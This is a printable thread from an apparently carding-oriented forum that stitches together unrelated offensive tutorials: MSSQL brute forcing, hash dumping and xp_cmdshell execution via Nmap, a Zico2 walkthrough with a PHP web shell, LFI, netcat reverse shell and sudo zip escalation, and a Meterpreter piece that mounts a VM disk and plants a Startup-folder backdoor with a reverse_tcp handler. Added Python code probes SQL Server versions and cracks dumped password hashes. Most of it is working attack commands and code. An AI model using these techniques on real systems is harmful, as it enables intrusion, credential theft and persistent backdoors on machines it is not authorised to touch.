[Guide] How to MSSQL Penetration Testing using Nmap - Printable Version
Blackhat Carding Forum | Bhcforums.cc (https://bhcforums.cc)
Thread: [Guide] How to MSSQL Penetration Testing using Nmap (https://bhcforums.cc/Thread-Guide-How-to-MSSQL-Peneration-Testing-using-Nmap)
[Guide] How to MSSQL Penetration Testing using Nmap - NINZA - 05-14-2020

Hello friends! Today we are going to perform Microsoft SQL Server penetration testing using Nmap NSE scripts, in order to retrieve basic information such as database names, usernames and table names from a SQL Server instance running on Windows. In our previous article we set up Microsoft SQL Server on Windows 10.

Requirements
Attacker: Kali Linux (Nmap)
Target: Windows 10 (MS SQL Server)

Let's start!

Scan port 1433

Open a terminal in Kali Linux and scan the target IP for port 1433, the default TCP port of the SQL Server database engine:

    nmap -p 1433 192.168.1.104

From the output you can observe that port 1433 is open and identified as the ms-sql-s service. Keep in mind that a named instance may listen on a dynamic port instead of 1433; the SQL Server Browser service on UDP 1434 reports such ports, and the mssql NSE library can be pointed at them with the script argument mssql.instance-all (or mssql.instance-port / mssql.instance-name).

Enumerating version information

The following command attempts to determine configuration and version information for the SQL Server instance. No credentials are needed, because the TDS PRELOGIN handshake already discloses the server version (the script also queries the Browser service on UDP 1434 when it is reachable):

    nmap -p 1433 --script ms-sql-info 192.168.1.104

In the output you can observe the installed version and details of the MS SQL Server.

Brute force attack

The following command attempts to determine valid usernames and passwords by brute-forcing MS SQL logins with a username dictionary and a password dictionary:

    nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

Each failed login is recorded in the SQL Server error log and the Windows Application log (event 18456), and SQL logins created with the password policy enforced can be locked out, so keep the dictionaries small on an engagement. In the output you can observe that we successfully retrieved credentials for two users:
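The version information that ms-sql-info reports without a password comes from the first packet of the TDS protocol: the client sends a PRELOGIN, and the server answers with its own PRELOGIN carrying a VERSION option and an ENCRYPTION option. The following is an added example written for this page (it is not code from the original post or from Nmap): it builds the client PRELOGIN, parses either side's packet following the MS-TDS PRELOGIN layout as I read it (major, minor, build as big-endian bytes), and can send the probe to a live host. The server reply at the bottom is constructed, not captured from a real instance.

```python
"""TDS PRELOGIN probe: how an unauthenticated scan learns the SQL Server version.
Added example for this page; packet layout follows MS-TDS 2.2.6.5 (PRELOGIN)."""
import socket
import struct

TDS_PRELOGIN = 0x12      # packet type used by the client's PRELOGIN
TDS_RESPONSE = 0x04      # the server's PRELOGIN reply arrives as a TABULAR RESULT packet
TDS_EOM = 0x01           # status bit: end of message

# PRELOGIN option tokens, followed by the 0xFF terminator of the token table.
OPT_VERSION, OPT_ENCRYPTION, OPT_INSTOPT, OPT_THREADID, OPT_MARS = range(5)
OPT_TERMINATOR = 0xFF
ENCRYPTION_NAMES = {0: "ENCRYPT_OFF", 1: "ENCRYPT_ON", 2: "ENCRYPT_NOT_SUP", 3: "ENCRYPT_REQ"}


def build_prelogin(options, ptype=TDS_PRELOGIN):
    """Encode (token, data) pairs as a PRELOGIN packet with an 8-byte TDS header.
    Each table entry is (token, offset, length); offsets count from the payload start."""
    table_len = 5 * len(options) + 1            # five bytes per token plus the terminator
    table, data = b"", b""
    for token, value in options:
        table += struct.pack(">BHH", token, table_len + len(data), len(value))
        data += value
    payload = table + bytes([OPT_TERMINATOR]) + data
    # header: type, status, total length, SPID, packet id, window
    header = struct.pack(">BBHHBB", ptype, TDS_EOM, 8 + len(payload), 0, 1, 0)
    return header + payload


def client_prelogin():
    """The PRELOGIN a client sends: zero version, encryption off, empty instance name."""
    return build_prelogin([
        (OPT_VERSION, b"\x00\x00\x00\x00\x00\x00"),
        (OPT_ENCRYPTION, b"\x00"),
        (OPT_INSTOPT, b"\x00"),
        (OPT_THREADID, b"\x00\x00\x00\x00"),
        (OPT_MARS, b"\x00"),
    ])


def parse_prelogin(packet):
    """Decode a client or server PRELOGIN packet into {'version': ..., 'encryption': ...}."""
    ptype, _status, length = struct.unpack(">BBH", packet[:4])
    if ptype not in (TDS_PRELOGIN, TDS_RESPONSE) or length != len(packet):
        raise ValueError("not a complete TDS PRELOGIN packet")
    payload = packet[8:]
    options, pos = {}, 0
    while pos < len(payload) and payload[pos] != OPT_TERMINATOR:
        token, offset, size = struct.unpack(">BHH", payload[pos:pos + 5])
        options[token] = payload[offset:offset + size]
        pos += 5
    result = {}
    if OPT_VERSION in options:
        major, minor, build = struct.unpack(">BBH", options[OPT_VERSION][:4])
        result["version"] = f"{major}.{minor}.{build}"
    if OPT_ENCRYPTION in options:
        result["encryption"] = ENCRYPTION_NAMES.get(options[OPT_ENCRYPTION][0], "unknown")
    return result


def probe(host, port=1433, timeout=5):
    """Send the PRELOGIN to a live server and return the parsed reply (host/port assumed)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(client_prelogin())
        return parse_prelogin(sock.recv(4096))


# Constructed server reply (not a real capture): SQL Server 2012 RTM, 11.0.2100, encryption off.
SAMPLE_RESPONSE = build_prelogin([
    (OPT_VERSION, struct.pack(">BBHH", 11, 0, 2100, 0)),
    (OPT_ENCRYPTION, b"\x00"),
    (OPT_INSTOPT, b"\x00"),
    (OPT_THREADID, b""),
    (OPT_MARS, b"\x00"),
], ptype=TDS_RESPONSE)

if __name__ == "__main__":
    print(parse_prelogin(SAMPLE_RESPONSE))      # {'version': '11.0.2100', 'encryption': 'ENCRYPT_OFF'}
```

The ENCRYPTION value is worth reading as well as the version: ENCRYPT_OFF or ENCRYPT_NOT_SUP means the subsequent LOGIN7 packet, and every query after it, crosses the wire unencrypted, which is also why the NTLM and credential-based scripts later on this page work against such a host without any TLS handling.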
Execute an MS SQL query

Once you have retrieved login credentials, use them in the Nmap script to execute an MS SQL query. The command below runs sp_databases, a catalog stored procedure that returns the list of databases on the instance:

    nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104

As a result it dumped two database names, "ignite" and "master"; master is the default system database of MS SQL Server.

Check the SQL Server configuration

The following command describes the SQL Server configuration settings, again passing the login credentials as script arguments:

    nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

You can check the configuration settings in the output below.

Obtain a list of tables

The following command fetches the list of tables from the databases on the SQL Server, passing the login credentials as script arguments:

    nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

You can check the list of tables in the output below.

Enumerate NetBIOS information

The following Nmap script enumerates information from a remote SQL Server with NTLM authentication enabled.
Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials causes the remote service to respond with an NTLMSSP message that discloses the NetBIOS name, DNS name and OS build version:

    nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104

From the output you can read the NetBIOS information of the remote SQL Server. This works without any valid credentials, so it is a useful host-identification step before authentication.

Dump password hashes

The following command dumps the password hashes of the SQL logins in a format suitable for cracking with tools such as John the Ripper. The login used needs sufficient privileges to read the hashes (the sysadmin account sa is enough):

    nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From the output you can observe that it dumped the password hash of user sa, which we enumerated above.

Identify the databases a user can access

The following command queries the SQL Server instance for the list of databases the given user has access to. The script name is ms-sql-hasdbaccess; the user needs the appropriate database privileges, so we pass the username and password as script arguments:

    nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In the output you can observe that user sa is shown as owner of the database "ignite".

MS SQL allows the xp_cmdshell option

xp_cmdshell is an extended stored procedure of Microsoft SQL Server that lets a login with sysadmin rights execute operating system commands, which run under the SQL Server service account. By default, the xp_cmdshell option is disabled.
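Before moving on to xp_cmdshell, here is what the hashes dumped above actually are and how a cracker uses them. The following is an added example written for this page (not code from the original post, from Nmap or from John the Ripper): it implements the two SQL Server hash formats, 0x0100 (SQL Server 2000 to 2008, SHA-1) and 0x0200 (SQL Server 2012 and later, SHA-512), both computed over UTF-16LE(password) followed by a 4-byte salt, and checks a wordlist against a dumped hash. The sample hash is constructed here with a fixed salt; it is not the hash from the screenshot.

```python
"""Verify candidate passwords against SQL Server password hashes as dumped by
ms-sql-dump-hashes.  Added example for this page; formats as stored in sys.sql_logins."""
import hashlib
import hmac
import os

# version prefix -> digest function; both formats hash UTF-16LE(password) || salt
HASH_ALGOS = {b"\x01\x00": hashlib.sha1, b"\x02\x00": hashlib.sha512}


def make_hash(password, salt=None, version=b"\x02\x00"):
    """Build a hash the way SQL Server stores it: 0x + version + 4-byte salt + digest."""
    salt = os.urandom(4) if salt is None else salt
    digest = HASH_ALGOS[version](password.encode("utf-16-le") + salt).digest()
    return "0x" + (version + salt + digest).hex().upper()


def parse_hash(hash_str):
    """Split a dumped hash into (version, salt, digest), validating its length."""
    raw = bytes.fromhex(hash_str[2:] if hash_str[:2].lower() == "0x" else hash_str)
    version, salt, digest = raw[:2], raw[2:6], raw[6:]
    if version == b"\x01\x00" and len(digest) == 40:
        # SQL Server 2000 stored sha1(pw) || sha1(upper(pw)); keep the case-sensitive half
        digest = digest[:20]
    if version not in HASH_ALGOS or len(digest) != HASH_ALGOS[version]().digest_size:
        raise ValueError("unrecognised SQL Server password hash format")
    return version, salt, digest


def check_password(hash_str, candidate):
    """True if candidate produces the stored digest under the stored salt."""
    version, salt, digest = parse_hash(hash_str)
    calc = HASH_ALGOS[version](candidate.encode("utf-16-le") + salt).digest()
    return hmac.compare_digest(calc, digest)


def crack(hash_str, wordlist):
    """Dictionary attack: return the first matching word, or None."""
    for word in wordlist:
        if check_password(hash_str, word):
            return word
    return None


def john_line(login, hash_str):
    """Format one login for John the Ripper's mssql12 / mssql05 formats: login:hash."""
    return f"{login}:{hash_str}"


# Constructed sample: login sa with the password used on this page, fixed salt
# DEADBEEF so the value is reproducible.  Not the hash from the screenshot.
SAMPLE_SALT = bytes.fromhex("DEADBEEF")
SAMPLE_HASH = make_hash("admin123", SAMPLE_SALT)              # SQL Server 2012+ style
SAMPLE_LEGACY_HASH = make_hash("admin123", SAMPLE_SALT, b"\x01\x00")   # SQL Server 2005 style

if __name__ == "__main__":
    print(john_line("sa", SAMPLE_HASH))
    print(crack(SAMPLE_HASH, ["password", "123456", "admin123"]))   # admin123
```

Note that neither format is iterated or memory-hard: one SHA-512 per guess means a GPU cracker tries billions of candidates per second, which is why a short password like admin123 on sa falls immediately once the hash is dumped.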
Enabling xp_cmdshell

From the image below you can see that we enabled xp_cmdshell by executing the following statements in the master database. xp_cmdshell is an advanced option, so "show advanced options" has to be switched on first; the original statement EXEC sp_configure 'xp_cmdshell'; without a value only displays the current setting, it does not change it:

    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;

Now apply the above configuration change with the following statement:

    RECONFIGURE;

Exploit the xp_cmdshell function

Now the following Nmap script will run a command through the command shell of Microsoft SQL Server, provided xp_cmdshell is enabled on the target. The script argument that carries the command is ms-sql-xp-cmdshell.cmd:

    nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.104

From the output you can confirm that we executed the OS command net user and retrieved the list of local user accounts. Because the command runs as the SQL Server service account, a sysadmin login on a server whose service runs as LocalSystem or a privileged domain account amounts to code execution on the host.

Blank password leads to unauthorized access

If the admin of Microsoft SQL Server leaves the password blank for a login, the attacker can log in to the database server directly. In the image below you can see we are looking at the properties of the user account "sa".

Here we set a blank space as the password for user "sa". As we know, sa is by default the administrator of MS SQL Server, and now that its password is a blank space the chance that an attacker gains unauthorized access to the server increases.

Make unauthorized access into the SQL Server

The following Nmap script tries to authenticate to the SQL Server using an empty password for the sysadmin (sa) account:

    nmap -p 1433 --script ms-sql-empty-password 192.168.1.104

From the output you can see that we logged in successfully with user sa and an empty password.

Today we are going to take another boot2root challenge known as Zico2 by "Rafael", where we have to root the system to complete the challenge.
Download this VM: (the download link is hidden on the forum copy of this page)

Difficulty Level: Intermediate

Penetration Methodologies
Scanning
Enumeration
Exploiting
Privilege Escalation
Walkthrough

Scanning

Let's start off by finding the target's IP with netdiscover; in this case it is 192.168.1.108.

    netdiscover

Time to scan the target's IP with Nmap. The scan result shows that port 22 (ssh), port 111 (rpcbind) and port 80 (http) are open.

    nmap -A 192.168.1.108

Enumeration

Since port 80 is running HTTP, our obvious choice is to browse the target's IP in a browser. We scroll through the page and click on "check them out", as can be seen in the following screenshot.

After clicking, it takes us to a page whose URL passes tools.html as the page to load, so it could be vulnerable to LFI; let's verify it.

Here I tried to get LFI and succeeded with "/../../etc/passwd". Now that we can read the content of the passwd file, we find a user 'zico' in there. Let's just save this info for now.

While enumerating directories with dirb, we found an interesting directory "/dbadmin".

    dirb [target URL, hidden on the forum copy of this page]

When we browse the '/dbadmin' directory, it lists a file named "test_db.php".

Here we can see a phpLiteAdmin login page along with its version number, so we can look the version up; the name "test_db" also hints at a default setup. So we tried 'admin' as the password and it worked.

Exploiting

Next we use searchsploit, which, as the name indicates, searches for all exploits and shellcodes for phpLiteAdmin (in this case). In the screenshot we can see that it is vulnerable to remote PHP code execution and the EDB-ID for it is '24044'. Once we copy it to the current working directory (/root/24044.txt) and open it, we find the guidelines to exploit the database.
    searchsploit phpliteadmin
    searchsploit -m 24044
    cat 24044.txt

Here we followed the guidelines:

Step 1: Created a database and named it 'shell.php' (the '.php' extension has to be part of the database name, because phpLiteAdmin writes the database to a file of that name under the web root).

Step 2: Created a table 'shell'. Inside the table we created a column 'field', selected 'Integer' as the column type and set the default value to:

    <?php echo system($_GET["cmd"]); ?>

From the following screenshot it can be seen that our PHP code has been saved in the database file.

Now we just have to get the server to execute the file (the full path of the created PHP file is exposed on the page). To execute it we can use the previously detected LFI vulnerability, and we got lucky: the command runs as 'www-data'.

Time to set up a netcat listener on our local machine and run a Python reverse shell one-liner through the uploaded shell's cmd parameter to get a reverse shell (refer to the next screenshot for the listener). The Python reverse shell reference is hidden on the forum copy of this page.

To get a proper shell with a TTY we use the Python pty one-liner. Once in the shell we find the 'wp-config.php' file inside "/home/zico/wordpress". The listener runs on the attacker machine; the remaining commands run in the reverse shell:

    nc -lvp 1234
    python -c 'import pty;pty.spawn("/bin/bash")'
    ls
    cd /home
    ls
    cd zico
    ls
    cd wordpress
    ls

Inside the wp-config.php file we discover the database user zico and its password.

    cat wp-config.php

Privilege Escalation

We use the recently discovered credentials to log in through SSH.
Then we use sudo -l to list all the commands the user can run with root privileges, and we can see that the user can run both tar and zip as root without entering a password. So now we escalate privileges from "zico" to "root". First we create a file 'raj', then a single zip command does three things: it zips the file 'raj' into /tmp/nisha.zip, the -T flag tells zip to test the archive, and --unzip-command replaces the program used for that test with a shell, which therefore runs as root. Finally we find 'flag.txt' inside the root directory. Hence we accomplished the task.

    ssh zico@192.168.1.108
    sudo -l
    touch raj
    sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
    cd /root
    ls
    cat flag.txt

The complete reference for exploiting sudo rights is hidden on the forum copy of this page.

Today you will learn how to install and configure MS SQL Server on the Windows 10 operating system.

Requirements: Windows 10, the SQL Server 2012 setup file (the 1st download) and the SQL Server Management Studio setup file (the 2nd download).
Open the 1st downloaded file, the SQL Server installer, and run it as administrator. Click on Installation, then choose "New SQL Server stand-alone installation".

To install SQL Server 2012 follow the steps below:
Enable the check box "Include SQL Server product updates" to pick up the security and performance fixes released since the media was built. It found a 26 MB update online, which is installed when you click Next.

Now it starts installing the SQL Server setup files on your system, which takes some time. As soon as setup is installed you get a new window for the feature selection of your SQL Server.

Feature Selection

Now select the features you want to install; in the given image you can see the check boxes I enabled.
Instance Configuration

Specify the name and instance ID for the instance of SQL Server. The directory structure, registry structure and service names all incorporate the instance name and a specific instance ID, and the instance ID becomes part of the installation path.
You can also select Default Instance if no instance of SQL Server was installed previously; a default instance does not require the user to give an instance name in order to connect.

Database Engine Configuration

Specify the authentication mode of the Database Engine. By default, sa is the administrator login of MS SQL. Under Authentication Mode, choose Mixed Mode (SQL Server authentication and Windows authentication) and set a password for the sa account; the rest of this guide connects as sa and as a SQL Server authentication login, which Windows authentication mode alone would not allow.
After that click Next on the remaining pages.

Your SQL Server 2012 installation is completed successfully; here you can check the status of the installed features.

Now open SQL Server Configuration Manager, where you will see a left and a right panel. Click on "Protocols for SQLEXPRESS" in the left panel and then select the protocol "TCP/IP" in the right panel.

In the TCP/IP properties, under the IP Addresses tab, set TCP Port to 1433, click Apply and enable TCP/IP. The change only takes effect after the SQL Server service is restarted, and it makes the instance reachable from the network on 1433, which is exactly what the Nmap scripts earlier on this page rely on.

Configure SQL Server Management Studio setup

Now open the 2nd downloaded application, the Management Studio setup, and add a new feature with it.

There are no updates for SQL Server 2012, so click Next.

Installation Type

Since we have already created the instance "SQLExpress", we can now add features to the SQLExpress instance of SQL Server 2012. In the image you can observe the table of installed instances. Click Next.

Feature Selection

Under Shared Features, enable the check box for "Management Tools - Basic", then click Next on the remaining pages.

The Management Tools - Basic installation completed successfully; here you can check the status of the installed features.

Now log in to SQL Server using the admin credentials and click Connect.

Once you are logged in to SQL Server, expand the Security folder and create a new login account for other users.

Enter the user name (I used "ignite") and set a password, choosing SQL Server authentication for this user. In the image you can observe that master is the default database.
Connect to the server

Run the HeidiSQL tool to connect to the MS SQL Server as the ignite user, as given below:

    Network type: TCP/IP
    Hostname /IP: 192.168.1.104
    User: ignite
    Password: 123456
    Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQL server, Microsoft SQL databases and PostgreSQL. It enables you to browse and edit data and to create and edit tables, views, procedures, triggers and scheduled events. Now click Open.

Great!! We have successfully accessed the database system of the MSSQL server. You can modify or create a new table, a new database and much more.

Today you will learn how to exploit any operating system running inside a virtual machine.

Requirements
From the given image you can see that I have obtained a Windows 10 meterpreter session and also gained admin privileges on it.

    meterpreter > sysinfo

When you install any operating system in VMware Workstation, all of its hardware and network settings are stored as a .vmx file on the host operating system. Type the following to search for the .vmx files stored on the host (-f is the file pattern, -r searches recursively):

    meterpreter > search -f *.vmx -r

From the given image you can see that it listed every location where .vmx files are stored.

Using the cat command you can read the content of such a file, since .vmx files are plain text documents containing the VMware settings.

    meterpreter > cat "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"

From the image below you can read the details of this file, which describes the guest's network and hardware settings, including the name of its virtual disk (.vmdk) file.

The Metasploit module used next mounts a .vmdk file (Virtual Machine Disk) on a drive letter provided by the user by taking advantage of the VMware vstor2 device driver. First it executes the binary vixDiskMountServer.exe to access the device, and then it sends certain control codes via DeviceIoControl to mount it. Use the write mode with extreme care: you should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked to the file, otherwise the guest's disk chain can be corrupted.
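Rather than eyeballing the cat output, the .vmx can be parsed to pull out exactly what this attack needs: the virtual disk file to hand to the mount module and the guest's network adapters. The following is an added example written for this page (not code from the original post or from Metasploit); the sample .vmx text is constructed to resemble the Windows Server 2012 guest on the page, and the MAC address and hardware values in it are made up. The .vmx format itself is simple key = "value" lines, which is all the parser relies on.

```python
"""Parse a VMware .vmx file to locate a guest's virtual disks and network adapters.
Added example for this page; the sample .vmx below is constructed, not a real guest's."""
import os
import re

_LINE = re.compile(r'^\s*([A-Za-z0-9_.:\-]+)\s*=\s*"(.*)"\s*$')


def parse_vmx(text):
    """Return {key: value}. VMware treats keys case-insensitively, so they are lowered."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = _LINE.match(line)
        if match:
            settings[match.group(1).lower()] = match.group(2)
    return settings


def _absolute(value, base):
    """fileName entries are usually relative to the .vmx directory; keep absolute ones as-is."""
    if value.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:[/\\]", value):
        return value
    return f"{base}/{value}" if base else value


def disk_files(settings, vmx_path=""):
    """Paths of the .vmdk files attached to present scsi/ide/sata/nvme devices."""
    base = os.path.dirname(vmx_path)
    disks = []
    for key, value in sorted(settings.items()):
        match = re.match(r"^(scsi|ide|sata|nvme)\d+:\d+\.filename$", key)
        if not match:
            continue
        device = key[:-len(".filename")]
        present = settings.get(device + ".present", "TRUE").upper() == "TRUE"
        if present and value.lower().endswith(".vmdk"):
            disks.append(_absolute(value, base))
    return disks


def network_adapters(settings):
    """{adapter index: {setting: value}} for every ethernetN that is present."""
    adapters = {}
    for key, value in settings.items():
        match = re.match(r"^ethernet(\d+)\.(.+)$", key)
        if not match:
            continue
        index, setting = match.group(1), match.group(2)
        if settings.get(f"ethernet{index}.present", "TRUE").upper() == "TRUE":
            adapters.setdefault(index, {})[setting] = value
    return adapters


# Constructed sample resembling the guest on this page (hardware values and MAC are invented).
SAMPLE_VMX_PATH = "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
SAMPLE_VMX = '''\
.encoding = "windows-1252"
config.version = "8"
virtualHW.version = "12"
displayName = "windows Server 2012"
guestOS = "windows8srv-64"
memsize = "2048"
scsi0.present = "TRUE"
scsi0.virtualDev = "lsisas1068"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "windows Server 2012.vmdk"
ide1:0.present = "TRUE"
ide1:0.fileName = "auto detect"
ide1:0.deviceType = "cdrom-raw"
ethernet0.present = "TRUE"
ethernet0.connectionType = "bridged"
ethernet0.virtualDev = "e1000e"
ethernet0.generatedAddress = "00:0C:29:AB:CD:EF"
ethernet1.present = "FALSE"
ethernet1.connectionType = "nat"
'''

if __name__ == "__main__":
    cfg = parse_vmx(SAMPLE_VMX)
    print(cfg["displayname"], cfg["guestos"])
    print(disk_files(cfg, SAMPLE_VMX_PATH))        # the .vmdk to mount
    print(network_adapters(cfg))
```

The disk path this returns is what the mount module needs: it mounts a .vmdk, so the disk file named by scsi0:0.fileName (in the same directory as the .vmx) is the value to give VMDK_PATH. A bridged adapter, as in the sample, also tells you the guest will sit on the same LAN as the host once it boots, which matters for where the reverse-shell handler has to listen.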
    use post/windows/manage/vmdk_mount
    msf post(vmdk_mount) > set DEL_LCK true
    msf post(vmdk_mount) > set READ_MODE false
    msf post(vmdk_mount) > set SESSION 2
    msf post(vmdk_mount) > set VMDK_PATH "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
    msf post(vmdk_mount) > run

DEL_LCK removes the lock files VMware leaves next to the disk, and READ_MODE false mounts it writable, which is required for the next step but carries the snapshot warning above. VMDK_PATH is the path of the disk file to mount; the command above passes the .vmx, and if the module refuses it, substitute the .vmdk file named in that .vmx (its scsi0:0.fileName entry, in the same directory).

Great!! We have successfully mounted the vmdk file of Windows Server 2012.

    meterpreter > show_mount

Now from the image below you can read the information of each drive, including the new drive letter the guest disk was mounted on (L: here).

Now using the command below I upload an exe backdoor to the guest's all-users Startup folder on the L: drive. It will give us a reverse connection from Windows Server 2012 the next time a user logs on after the VM is started in VMware Workstation. The backdoor must have been generated for the same LHOST and LPORT the handler below listens on.

    meterpreter > upload /root/Desktop/abc.exe "L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"

    use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.1.113
    msf exploit(handler) > set lport 4455
    msf exploit(handler) > run

Awesome!! We have successfully exploited the Windows Server 2012 virtual machine and gained a meterpreter session on it.

    meterpreter > sysinfo